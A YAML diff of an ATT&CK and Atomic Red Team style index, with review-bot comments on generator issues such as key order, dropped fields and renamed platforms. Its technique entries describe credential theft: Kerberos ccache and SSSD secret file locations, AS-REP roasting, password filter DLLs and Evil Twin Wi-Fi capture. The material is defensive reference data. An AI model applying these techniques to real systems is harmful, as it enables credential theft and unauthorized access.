@@ -53918,76 +54538,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
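Review bot: the new T1558.005 block closes with `atomic_tests: []` straight after `x_mitre_modified_by_ref` and has no `identifier:` key, whereas the neighbouring T1556.002 block ends with `identifier: T1556.002` before its `atomic_tests: []`. If the generator only emits `identifier` when an atomics directory exists for the technique this is expected for a sub-technique with no tests yet; otherwise it is dropping the key and anything that joins on `identifier` will miss the new entry. Two smaller points in the same region: the `T1558.004:` map key is removed here and re-added after T1558.005, so the index now follows upstream object order rather than technique id, which turns every data refresh into a large reorder diff (sorting map keys by technique id in the generator would keep these reviewable); and the added T1558.005 description shows `configuration`, `environment variable are used to set` and two bare `,` lines without a `+` prefix inside an otherwise added block, exactly where `/etc/krb5.conf`, `KRB5CCNAME`, `kinit` and `klist` would have been inline code upstream, so confirm that the double-quoted scalar in the generated file is one contiguous string and still parses.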
@@ -54022,6 +54695,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -54029,32 +54709,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
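Review bot: the Linux and macOS paragraphs removed from the T1558 description (`Linux systems on Active Directory domains store Kerberos credentials locally ...` and `Kerberos tickets on macOS are stored in a standard ccache format ...`) are the material now carried by the new T1558.005 Ccache Files sub-technique earlier in this diff, so narrowing the parent to the Windows `klist` sentence is intentional and the 1.5 to 1.6 bump in the next hunk matches. The removed Linux paragraph is rendered as three lines of which only the first carries a `-` (`as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey` and `. Both files require root access to read.` appear unprefixed), the same markup loss seen in the T1558.005 description, so check the literal block scalar in the actual file. Separately, `x_mitre_permissions_required: - User` is removed from T1558.004 here, and the same field goes from T1556.002 (`Administrator`, `SYSTEM`) and T1555.003 (`User`) elsewhere in the diff; any consumer of this index that reads permissions_required loses that data with the 3.2.0 spec bump. Finally, the Harmj0y reference URL changes from `http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/` to `https://blog.harmj0y.net/activedirectory/roasting-as-reps/` with a new retrieval date of September 23, 2024, a real content change hidden inside what otherwise reads as a reorder.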
@@ -54090,7 +54806,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -54115,13 +54831,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
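Review bot: removing the `Kekeo` and `SpectorOps Bifrost Kerberos macOS 2019` references from T1558 is consistent with the description paragraphs that cited them having been cut in the earlier hunk, and both references reappear verbatim under the new T1558.005 external_references, so no `(Citation: ...)` marker left in the T1558 text is dangling. Worth a quick grep after applying, since a citation key that survives in a description without a matching source_name is the usual failure mode of this kind of split.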
@@ -54130,14 +54839,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
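Review bot: unlike Kekeo and the SpecterOps post, the `macOS kerberos framework MIT` and `MIT ccache` references removed here do not reappear under T1558.005 (its external_references list only Binary Defense Kerberos Linux, Kerberos GNU/Linux, Kekeo, SpectorOps Bifrost, Brining MimiKatz to Unix and Linux Kerberos Tickets), so the MIT credential cache documentation link leaves the index entirely. Citation integrity is preserved, because no remaining description in this diff carries `(Citation: MIT ccache)` or `(Citation: macOS kerberos framework MIT)`, but anyone who used this index as a pointer to the primary ccache format documentation should know that link is gone.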
@@ -54159,23 +54860,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
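Review bot: `spec_version: '2.1'` is dropped from T1558 here and also from T1555, T1552, T1556.007 and T1555.003 further down, while `x_mitre_attack_spec_version` becomes 3.2.0 everywhere; tooling that distinguished the STIX spec_version from the ATT&CK spec version now has only the latter. The `Brining MimiKatz to Unix` and `Linux Kerberos Tickets` removals mirror the Kekeo and SpecterOps case, both being re-added under T1558.005, so they are relocated rather than lost. Note that `Brining` is the upstream source_name spelling and has to stay misspelled, because the T1558.005 description cites `(Citation: Brining MimiKatz to Unix)` literally.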
@@ -54226,12 +54918,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -54243,6 +54934,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
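Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted directly after `kill_chain_phases` for T1552, and the matching line is deleted from the bottom of the same object later in the diff, so this is a key move rather than a new field. The resulting alphabetical order (attack_spec_version, contributors, deprecated, detection, domains, is_subtechnique, modified_by_ref, platforms) differs from T1558.004 and T1555.003 in the same regeneration, where `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` stay at the tail after `object_marking_refs`. The generator appears to pass through whatever key order the upstream STIX bundle serialized, which is why a data refresh produces so much churn; emitting a canonical key order would shrink these diffs to the actual content changes.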
@@ -54257,18 +54949,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
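Review bot: the T1552 platform list drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with the version moving 1.3 to 1.4, and T1556.007 receives the identical substitution further down. Confirm that every per-platform index derived from these platform names (the index files named after Google Workspace, Azure AD or Office 365) is regenerated or retired in the same change; otherwise they silently stop matching techniques that now only list `Office Suite` or `Identity Provider`, and consumers filtering on the old names will see those techniques vanish without any error.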
@@ -54291,9 +54983,6 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552
atomic_tests:
- name: AWS - Retrieve EC2 Password Data using stratus
@@ -54361,32 +55050,113 @@ credential-access:
rm -rf stratus*
name: sh
elevation_required: false
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
